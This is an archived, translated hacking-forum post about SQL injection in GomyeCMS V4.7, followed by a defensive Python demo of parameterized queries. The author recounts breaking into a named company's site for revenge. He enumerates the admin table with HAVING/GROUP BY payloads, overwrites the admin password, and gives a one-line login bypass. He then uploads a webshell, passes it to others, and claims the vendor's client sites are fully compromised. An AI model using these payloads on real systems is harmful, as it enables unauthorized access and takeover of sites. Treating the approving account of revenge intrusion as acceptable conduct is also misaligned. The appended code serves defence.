GomyeCMS V4.7 universal login vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62200925076
Type myhack58
Reporter Anonymous
Modified 2009-10-20T00:00:00


Author: Zake 2009/10/18

It has been a long time since I wrote a technical article; in a moment of excitement I wrote the one below!

The program author's company website is at <http://www.gomye.net/>

Preface: I have not been learning SQL for very long, so if any statement below is written wrong, I ask the experts to forgive me. There is a scam company in Chengdu; search Baidu or Google for the keyword "Liao mind Bang Bang chicken" and flip through a few pages and you will see plenty of news about this company. It tricked my cousin out of a franchise fee. So I wanted to visit their company website. Their domain is www.liaoji.com. When I opened the site, everything was shtml or asp, so I figured the shtml might be generated by an aspx program, but exactly which program was unclear. I poked around a bit and found a message board, and while I was there I tried cross-site scripting with JavaScript. The result was surprising: the program's filter reported an illegal statement, and the error page was an aspx one. .NET may be a strongly typed language, but it still has plenty of ills. I then found a strange directory called GCMS; I won't say how I reached it. Going to the backend login page, it was /GCMS/logno.aspx, program name GomyeCMS V4.7. What is this program? I had never seen it; Baidu and Google turned up almost nothing. Now what? No injection, and the backend login didn't seem injectable either (I was stupid and didn't test in depth). As a side note, I found that several sites on the whole server ran this app. Finally, next to the main site, I found a master station running this program. Manual testing turned up problems, and eventually I found that the app has a defect (my brother also told me about it): in its live links, such as TID=12, there is an injection point. I merged TID=12) onto the front and injected, but after messing about I got nothing useful. Anxious, I used its message board to find its backend, and at the backend login, hoping for a fluke, I tested the login for injection. Heavens, wasn't I ecstatic!

The backend could be injected, which is a serious mistake. To read the version number, execute 'or @@version=1-- ; the SQL version is 2005. Here I want to point out that the login box and search box injection points are character-type, so you have to put a single quote in front to close the quote. Some time ago a friend posted an article about MSSQL injection on his blog that muddled this point, and it led many friends to treat a numeric-type injection point as character-type during injection; the numeric type needs no closing, so no single quote is needed. Looking at the version number, I thought: since we are at the backend login, his program surely reads the management table, so we don't need the trouble of looking for the directory for a backup. Once in the backend we can get a shell, so there is no need to go hunting for the directory for a backup. Everyone agrees? Good, no more nonsense, let's get to work. Execute the statement 1'having 1=1-- and get the message: "Column 'Content_Master.Master_ID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause." Everyone can see "Content_Master.Master_ID". What HAVING means I won't explain in detail; search Baidu or Google and you will know. Here we see two things: in front is the management table Content_Master, behind it is the ID. Then we continue! Execute the statement 1'group by Master_ID having 1=1-- and the second field, Master_UserName, is exposed. We keep going like this until we reach the fields we want, and then go for the data. Execute the statement 1'group by Master_ID,Master_UserName having 1=1-- and so on, field by field, until we have what we want. The final result shows Master_UserName and Master_Password, the two fields I wanted. Then what's there to talk about? Go straight for it!

OK, let's get on with it: 1'or(select top 1 Master_UserName+'|'+Master_Password from Content_Master)>0-- . To help novices learn, I'll explain what this statement means; masters can skip this, forgive my clumsiness. or and AND are connecting characters that join the injected statement to what comes after; select is the query; top 1 is the first row at the top; Master_UserName+'|'+Master_Password needs no explanation, those are the fields, and the '|' in the middle is a delimiter so the account and password are separated by | and we can read them clearly without confusion; from Content_Master is the table. We see the result, but the password can't be decrypted? Hey, I didn't have that much time to waste on it. Directly: update Content_Master SET Master_Password='a simple 16-bit MD5 hashed password goes here' where Master_UserName='admin' . This statement changes the admin password to the password value we want; after the change I read the password out again, and it was right. Very excited, I went to log in, and this time found, damn it, the correct password would not log in. I thought this account had been banned. Is there another account? No way, I had to test it, huh! 1'or(select top 1 Master_UserName+'|'+Master_Password from Content_Master where Master_UserName not in('admin'))>0-- . At the back I added a condition, account not equal to admin, to see if there were any other accounts; the result came back empty. Now I was depressed. Forget it, first a cigarette, then prepare to read the directories; if I can update, then the permissions are at least DB. Cigarette finished, carry on playing. First step: see what permissions we have, at least to have some idea where we stand. A lot of people who intrude are not like me; only at this point do they check permissions, huh!

The first step: test whether we have DB permissions. Execute 1'or (Select IS_MEMBER('db_owner'))=1-- . Heavens! Which god wrote this program! This statement goes straight into the backend! No password needs to be entered at all! My god, programmers these days! I F... In fact I had smoked a cigarette and gone to the WC to knock the ash off; maybe I had cursed the bad luck away, and so good luck came: straight into the backend, you'd never guess! Found an upload, uploaded an aspx horse straight away, and the server permissions were great! Couldn't jump to other sites. Find a target to take back to him: he lied people out of 20 million, so he still has to be hacked 20 times over. Finally I threw the shell to those brothers and let them go and help me curse him! Here I want particularly to thank two talents: first, Ghost Boy, and second, Folding Feather Bird & Bird, a good man. The cursing had great taste; my heart felt cool! I won't say more; the Silver God was in rhythm too, and the scolding was good! Liar, you deserve to be cursed! This article was supposed to be about a vulnerability; in fact I have mostly been talking to myself. Finally, I also want to mention someone, February 30th: this brother is very good and has helped me many times with the SQL language!

Final summary: tested on the official site at <http://www.gomye.net/a.asp>

1'or (Select IS_MEMBER('db_owner'))=1-- This statement is this app's universal login: no account or password needs to be entered anywhere. The program author's company website is at <http://www.gomye.net/>; on their site I found several of their success stories, and the test result was 100% compromised! End of presentation. Thank you for viewing!
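The universal login above works because the login page builds its SQL by concatenating the username into a string, and because the application's database account is a member of db_owner, so IS_MEMBER('db_owner') evaluates to 1 and the WHERE clause becomes true without any password. The following is an added example, not code from this write-up or from GomyeCMS: a Python login check built two ways over an in-memory SQLite table. The table and column names (Content_Master, Master_UserName, Master_Password) are taken from the write-up; the IS_MEMBER emulation, the sha256 hashing helper, the sample admin row and the function names are assumptions made for the demonstration.

```python
import hashlib
import sqlite3

# Payload exactly as given in the write-up; the password field is irrelevant to it.
UNIVERSAL_LOGIN = "1'or (Select IS_MEMBER('db_owner'))=1--"


def hash_pw(password: str) -> str:
    # Placeholder for a real password hash (bcrypt/argon2); sha256 keeps the
    # example self-contained. The write-up's app used unsalted 16-char MD5.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample database shaped like the management table enumerated above."""
    conn = sqlite3.connect(":memory:")
    # Emulate MSSQL's IS_MEMBER() so the payload parses in SQLite. Returning 1
    # for db_owner mirrors the over-privileged connection the write-up found;
    # an app account that is not db_owner would make this evaluate to 0.
    conn.create_function("IS_MEMBER", 1, lambda role: 1 if role == "db_owner" else 0)
    conn.execute(
        "CREATE TABLE Content_Master ("
        "Master_ID INTEGER PRIMARY KEY, Master_UserName TEXT, Master_Password TEXT)"
    )
    conn.execute(
        "INSERT INTO Content_Master VALUES (1, 'admin', ?)",
        (hash_pw("correct horse"),),
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """String-concatenated query: user input becomes part of the SQL grammar."""
    sql = (
        "SELECT Master_UserName FROM Content_Master WHERE Master_UserName='"
        + username + "' AND Master_Password='" + hash_pw(password) + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized query: the payload is compared as a literal username."""
    row = conn.execute(
        "SELECT Master_UserName FROM Content_Master "
        "WHERE Master_UserName=? AND Master_Password=?",
        (username, hash_pw(password)),
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    conn = make_db()
    return {
        # The injected clause turns the WHERE into "...='1' OR 1=1", so the
        # first row (admin) is returned and the check passes with any password.
        "vuln_bypass": login_vulnerable(conn, UNIVERSAL_LOGIN, "anything"),
        # Bound as a parameter, the same string matches no username.
        "safe_bypass": login_parameterized(conn, UNIVERSAL_LOGIN, "anything"),
        # Legitimate credentials still work through the parameterized path.
        "safe_real": login_parameterized(conn, "admin", "correct horse"),
    }


if __name__ == "__main__":
    print(demo())
```

Two controls remove the bug class rather than the one payload: bind every user-supplied value as a parameter (the `?` placeholders above), and run the application's database login with the least privilege it needs, so that role checks such as IS_MEMBER('db_owner') are false even if a concatenation slips through. The HAVING/GROUP BY column enumeration earlier in the write-up additionally depends on raw database error text reaching the browser, so returning a generic error page instead of the driver's message closes that information leak.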